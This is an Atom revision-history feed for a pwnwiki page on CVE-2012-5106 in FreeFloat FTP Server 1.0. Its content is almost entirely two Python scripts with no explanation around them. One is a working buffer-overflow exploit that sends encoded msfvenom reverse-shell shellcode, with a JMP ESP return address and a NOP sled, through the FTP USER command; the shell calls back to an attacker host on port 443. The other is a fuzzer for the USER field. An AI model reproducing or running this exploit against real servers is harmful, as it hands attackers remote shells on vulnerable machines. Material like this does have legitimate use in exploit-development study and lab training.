https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2012-5106_FreeFloat_FTP_Server_1.0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2012-5106 FreeFloat FTP Server 1.0任意代碼執行漏洞 - Revision history
2026-04-14T14:34:59Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2012-5106_FreeFloat_FTP_Server_1.0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=980&oldid=prev
Pwnwiki: Created page with "===freefloat-ftp.py=== <pre> #!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699DB FFE4 JMP ESP # bad characters \..."
2021-04-04T06:23:44Z
<p>Created page with "===freefloat-ftp.py=== <pre> #!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699DB FFE4 JMP ESP # bad characters \..."</p>
<p><b>New page</b></p><div>===freefloat-ftp.py===<br />
<pre><br />
#!/usr/bin/python<br />
<br />
import socket<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
<br />
# 774699DB FFE4 JMP ESP<br />
<br />
# bad characters \x00\x0a\x0d<br />
<br />
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows<br />
<br />
shellcode=("\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xbd\x3a\x84\xb7\xdf\xb1"<br />
"\x52\x31\x68\x17\x83\xc0\x04\x03\x52\x97\x55\x2a\x5e\x7f\x1b"<br />
"\xd5\x9e\x80\x7c\x5f\x7b\xb1\xbc\x3b\x08\xe2\x0c\x4f\x5c\x0f"<br />
"\xe6\x1d\x74\x84\x8a\x89\x7b\x2d\x20\xec\xb2\xae\x19\xcc\xd5"<br />
"\x2c\x60\x01\x35\x0c\xab\x54\x34\x49\xd6\x95\x64\x02\x9c\x08"<br />
"\x98\x27\xe8\x90\x13\x7b\xfc\x90\xc0\xcc\xff\xb1\x57\x46\xa6"<br />
"\x11\x56\x8b\xd2\x1b\x40\xc8\xdf\xd2\xfb\x3a\xab\xe4\x2d\x73"<br />
"\x54\x4a\x10\xbb\xa7\x92\x55\x7c\x58\xe1\xaf\x7e\xe5\xf2\x74"<br />
"\xfc\x31\x76\x6e\xa6\xb2\x20\x4a\x56\x16\xb6\x19\x54\xd3\xbc"<br />
"\x45\x79\xe2\x11\xfe\x85\x6f\x94\xd0\x0f\x2b\xb3\xf4\x54\xef"<br />
"\xda\xad\x30\x5e\xe2\xad\x9a\x3f\x46\xa6\x37\x2b\xfb\xe5\x5f"<br />
"\x98\x36\x15\xa0\xb6\x41\x66\x92\x19\xfa\xe0\x9e\xd2\x24\xf7"<br />
"\xe1\xc8\x91\x67\x1c\xf3\xe1\xae\xdb\xa7\xb1\xd8\xca\xc7\x59"<br />
"\x18\xf2\x1d\xcd\x48\x5c\xce\xae\x38\x1c\xbe\x46\x52\x93\xe1"<br />
"\x77\x5d\x79\x8a\x12\xa4\xea\x75\x4a\xa7\x93\x1d\x89\xa7\x62"<br />
"\x65\x04\x41\x0e\x89\x41\xda\xa7\x30\xc8\x90\x56\xbc\xc6\xdd"<br />
"\x59\x36\xe5\x22\x17\xbf\x80\x30\xc0\x4f\xdf\x6a\x47\x4f\xf5"<br />
"\x02\x0b\xc2\x92\xd2\x42\xff\x0c\x85\x03\x31\x45\x43\xbe\x68"<br />
"\xff\x71\x43\xec\x38\x31\x98\xcd\xc7\xb8\x6d\x69\xec\xaa\xab"<br />
"\x72\xa8\x9e\x63\x25\x66\x48\xc2\x9f\xc8\x22\x9c\x4c\x83\xa2"<br />
"\x59\xbf\x14\xb4\x65\xea\xe2\x58\xd7\x43\xb3\x67\xd8\x03\x33"<br />
"\x10\x04\xb4\xbc\xcb\x8c\xd4\x5e\xd9\xf8\x7c\xc7\x88\x40\xe1"<br />
"\xf8\x67\x86\x1c\x7b\x8d\x77\xdb\x63\xe4\x72\xa7\x23\x15\x0f"<br />
"\xb8\xc1\x19\xbc\xb9\xc3")<br />
<br />
buffer = "A" * 230 + "\xdb\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (800-230-351-16)<br />
<br />
try:<br />
print "\nSending evil buffer..."<br />
s.connect(("192.168.1.131", 21))<br />
s.recv(1024)<br />
s.send('USER ' + buffer + '\r\n')<br />
data = s.recv(1024)<br />
print "\nDone!."<br />
except:<br />
print "Could not connect to FTP!"<br />
<br />
<br />
</pre><br />
<br />
<br />
===ftp-user-fuzz.py===<br />
<pre><br />
#!/usr/bin/python<br />
<br />
import socket<br />
<br />
<br />
<br />
buffer = ["A"]<br />
counter=100<br />
<br />
while len(buffer) < 30:<br />
buffer.append("A"*counter)<br />
counter=counter+200<br />
<br />
for string in buffer:<br />
print "Fuzzing USER with %s bytes" % len(string)<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
connect = s.connect(("192.168.1.131", 21))<br />
s.recv(1024)<br />
s.send('USER ' + string + '\r\n')<br />
s.send('QUIT\r\n')<br />
s.close()<br />
<br />
<br />
</pre></div>
Pwnwiki